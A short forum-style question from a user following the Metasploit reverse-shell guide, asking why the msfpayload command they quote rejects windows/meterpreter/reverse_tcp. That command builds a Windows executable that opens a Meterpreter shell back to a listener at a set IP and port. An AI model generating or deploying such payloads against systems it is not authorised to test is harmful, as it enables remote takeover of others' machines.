So, I'm following this guide and I have some problems:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit
When I use this command, it will not accept it as a correct payload:
./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X > /tmp/iambad.exe
The reverse_tcp does not seem to be a correct payload, how can I fix this?